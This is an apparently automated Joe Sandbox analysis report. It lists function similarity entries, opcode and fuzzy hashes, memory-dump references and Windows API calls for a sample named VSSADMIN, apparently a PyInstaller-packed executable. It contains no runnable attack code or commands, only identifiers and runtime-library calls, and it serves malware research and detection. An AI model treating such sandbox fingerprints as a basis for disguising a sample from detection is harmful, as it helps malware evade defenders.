• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: EnvironmentStrings$Free
• String ID:
• API String ID: 3328510275-0
• Opcode ID: 08e1cb85d2d4b9f20ebe00a5e397d2c4a90d52e31469bbe02bcf41e4b3f4404d
• Instruction ID: 86ae2a7c9ac34b9effb91f5fb758d4cce142ce8dd4377a269625a40a6aa1c3b3
• Opcode Fuzzy Hash: 08e1cb85d2d4b9f20ebe00a5e397d2c4a90d52e31469bbe02bcf41e4b3f4404d
• Instruction Fuzzy Hash: 61010811F18F6681EA24AF16B04106A6370AF45FF4F8C4636DF6D537C5DE2DE4428300
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: cd414821b6f546225101efcda0891026701ff68dd4107860c76c66003ece607e
• Instruction ID: 03ae247b27809fa9dc73bbb45872fdf4a5ba0edb87a9d231745c0654aac005f1
• Opcode Fuzzy Hash: cd414821b6f546225101efcda0891026701ff68dd4107860c76c66003ece607e
• Instruction Fuzzy Hash: B7419E32908A4787EA24CA19E58127973B1EB97FA1F140232E78EC36D1DF2CE402E750
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
• Opcode ID: 0f194d5094c1cf518840656965e69513bbf0ac4dc6595ea5cd95a1eaade7605d
• Instruction ID: b63e5b07194cf5a7f77fe1ab55d2cf8db54b057f4d9f915d165a8fd17a857cbd
• Opcode Fuzzy Hash: 0f194d5094c1cf518840656965e69513bbf0ac4dc6595ea5cd95a1eaade7605d
• Instruction Fuzzy Hash: 4E21A621B0EA5647FA249B1269847FAA661BF46FE5F885432EE0D87786DE3DF041C700
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 5ed01260f61c1a9edb3b9c9d383e1d052b4bb4cd62c1ee8f87bb56751b307cf1
• Instruction ID: bdca0d7cf7522b048a09474cbe80d8adb55b27009ca6eefbae7a56d23ab045d5
• Opcode Fuzzy Hash: 5ed01260f61c1a9edb3b9c9d383e1d052b4bb4cd62c1ee8f87bb56751b307cf1
• Instruction Fuzzy Hash: 1531AE71A18E4385EB11AB59888037C7670AF83FB4F41063BEA2D873D2DF7DA441A714
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
• Instruction ID: 851e6e4591848b8cd216b5c5358cf1129bc3be11b57677648a27b92bad48828b
• Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
• Instruction Fuzzy Hash: 15119621A0CA5381EF609F51948027DA2B0BFD7FA5F444437EA8CC769ADF7CD500A700
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: bfd0dbd31329e8855e2ea518bb8c472100a71056899b27504ce81c8632d734fa
• Instruction ID: 7db7c192fe2b76f524c7c5b2199fb77893a77cb47f2a59ddee350370a1325f0f
• Opcode Fuzzy Hash: bfd0dbd31329e8855e2ea518bb8c472100a71056899b27504ce81c8632d734fa
• Instruction Fuzzy Hash: 8A217F33A18A4296DB618F18E48036976B0EB96FA8F244236EA5D876D5DF3DD5018B04
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
• Instruction ID: eaf90d44afeb166a819dae1377bcbe54cf659c47168e4e3329ca6316d345c132
• Opcode Fuzzy Hash: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
• Instruction Fuzzy Hash: 2401A561A0CF4342E904DB5299D1079A7A1BB87FF0F084636DE5C97BEADE3CD5018704
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: ff7701af8cb768011259a96fb0cdaae69b45464d9f9b930ea94a69369e7e69e2
• Instruction ID: b77321515603504d9b62c82e2a173a6986a4da05f98fdb29e80b7c19908d795b
• Opcode Fuzzy Hash: ff7701af8cb768011259a96fb0cdaae69b45464d9f9b930ea94a69369e7e69e2
• Instruction Fuzzy Hash: DC113A32A18E4382F3109B14A4C0579B2B5EB86BA4F55453AE69DC77A2DF7CF810AB40
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(?,?,00000000,00007FF614C8A8E6,?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E), ref: 00007FF614C8DDC5
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 71284afaabaf46e061be5dd41c1ee9242f4793079330fcfb9ee2b8ac464e22c2
• Instruction ID: 2ab543c3322530bba426973a480ad6d1261eab43de51dadf3a8a2d539df9437f
• Opcode Fuzzy Hash: 71284afaabaf46e061be5dd41c1ee9242f4793079330fcfb9ee2b8ac464e22c2
• Instruction Fuzzy Hash: 12F06D44B09A4782FE585B6198D03B512B05F8BFA4F0C4433C90EC73C2EE1CE892A320
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(?,?,?,00007FF614C7FE74,?,?,?,00007FF614C81386,?,?,?,?,?,00007FF614C82979), ref: 00007FF614C8CB3A
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: a7ce567b16112f19067e33b9dc0b94b4c499acd5a025fbf7a889946ef18f26a1
• Instruction ID: bca662125605553ae1b21a038d26fc7c5dfebe982e319e74c95680a684b58faa
• Opcode Fuzzy Hash: a7ce567b16112f19067e33b9dc0b94b4c499acd5a025fbf7a889946ef18f26a1
• Instruction Fuzzy Hash: 72F05860F0DE8745FE2456A298D027652A05FCAFB4F080732D82EC72C2DE2CE841E120
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF614C77A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
• LoadLibraryW.KERNEL32(?,?,00000000,00007FF614C730DE), ref: 00007FF614C77203
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ByteCharLibraryLoadMultiWide
• String ID:
• API String ID: 2592636585-0
• Opcode ID: 14271922cd67107be1aa73486209c40478193cbc4b897bf2be9679daf36d23cb
• Instruction ID: c2dc439a3e07cf12c6c8a97061bfe7f530db5fbb37d1289f7fe249e7d715aabf
• Opcode Fuzzy Hash: 14271922cd67107be1aa73486209c40478193cbc4b897bf2be9679daf36d23cb
• Instruction Fuzzy Hash: 34E02611B1858682EE089767F54146AA161AF48FD0B089036DE0D83716DD2DD4804A00
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
• String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
• API String ID: 2446303242-1601438679
• Opcode ID: 459a4d17a5d9d63fd32af7de9d21940b0e91a324c601fae87eb48516cdd5ea8c
• Instruction ID: 801b439429b27baf6ecd1df9797fe4a70b957b65cb2c3ca371bbec845ee868d9
• Opcode Fuzzy Hash: 459a4d17a5d9d63fd32af7de9d21940b0e91a324c601fae87eb48516cdd5ea8c
• Instruction Fuzzy Hash: 90A16A36218F8197E7148F26E58479AB370F789BA4F50412AEB8D43B24CF3EE165CB40
Uniqueness
• Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
• Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: EnvironmentVariable$ByteCharMultiWide
• String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
• API String ID: 2184640988-1666712896
• Opcode ID: 9bdffb1b50c3161ebfeb316bcddf5aa0d76d079b0f97c82e6ecc90dc1062e570
• Instruction ID: a64d13cd417bde63bbdea354a54341773e3750b40902b89e0aaa265eedcbfbf3
• Opcode Fuzzy Hash: 9bdffb1b50c3161ebfeb316bcddf5aa0d76d079b0f97c82e6ecc90dc1062e570
• Instruction Fuzzy Hash: 0261B122708B8645EB198F25A86027967A5EF45BF4B588331DF6D43BD4DFBDE809A300
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetTempPathW.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C76837
  • Part of subcall function 00007FF614C769B0: GetEnvironmentVariableW.KERNEL32(00007FF614C73707), ref: 00007FF614C769EA
  • Part of subcall function 00007FF614C769B0: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF614C76A07
  • Part of subcall function 00007FF614C866E4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C866FD
• SetEnvironmentVariableW.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C768F1
  • Part of subcall function 00007FF614C72770: MessageBoxW.USER32 ref: 00007FF614C72845
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
• String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
• API String ID: 3752271684-1116378104
• Opcode ID: 0274a45065aed080cbde3c9ac4a42289c92a47d5d649372871529f0d26a49517
• Instruction ID: 1cae1ea25543fdb881c81395485c0a068bf470262e7b5c1990f7eaaaa6251334
• Opcode Fuzzy Hash: 0274a45065aed080cbde3c9ac4a42289c92a47d5d649372871529f0d26a49517
• Instruction Fuzzy Hash: 29515D21B0DA4392FE14A776A9952BAA2619F47FF1F445037ED0ECB797EE2DE4018300
Uniqueness
• Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
• Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: a2d914222e0312e5cf461600ac8b059d6c61fa3806f1dd2a9609d900ee9212fe
• Instruction ID: 87382159bc7bedb7ec190a006a1c6c045a977c5574e2d10e5ad9868f2828325e
• Opcode Fuzzy Hash: a2d914222e0312e5cf461600ac8b059d6c61fa3806f1dd2a9609d900ee9212fe
• Instruction Fuzzy Hash: 9F315972708B858AEB649F60E8607EE7364FB84748F44413ADB4E57B88DF78D548D700
Uniqueness
• Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
                                                                                                                                                                      • Opcode ID: ed99729a06427ffe8919d80707f0d22f85e2a1f7f16501b693ecc562f35910ed
                                                                                                                                                                      • Instruction ID: f8043513b5143111166cb1be153dfde0e0a9889e6b983e9f6b1439ac5fa07e28
                                                                                                                                                                      • Opcode Fuzzy Hash: ed99729a06427ffe8919d80707f0d22f85e2a1f7f16501b693ecc562f35910ed
                                                                                                                                                                      • Instruction Fuzzy Hash: FD314D76608E8196EB608F64E8803E97371FB85B58F44403ADB4D87A98EF3DD648C710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C94E95
                                                                                                                                                                        • Part of subcall function 00007FF614C947E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C947FC
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: HeapFree.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E5E
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: GetLastError.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E68
                                                                                                                                                                        • Part of subcall function 00007FF614C89E00: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF614C89DDF,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C89E09
                                                                                                                                                                        • Part of subcall function 00007FF614C89E00: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF614C89DDF,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C89E2E
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C94E84
                                                                                                                                                                        • Part of subcall function 00007FF614C94848: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C9485C
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C950FA
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C9510B
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C9511C
                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF614C9535C), ref: 00007FF614C95143
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                      • String ID:
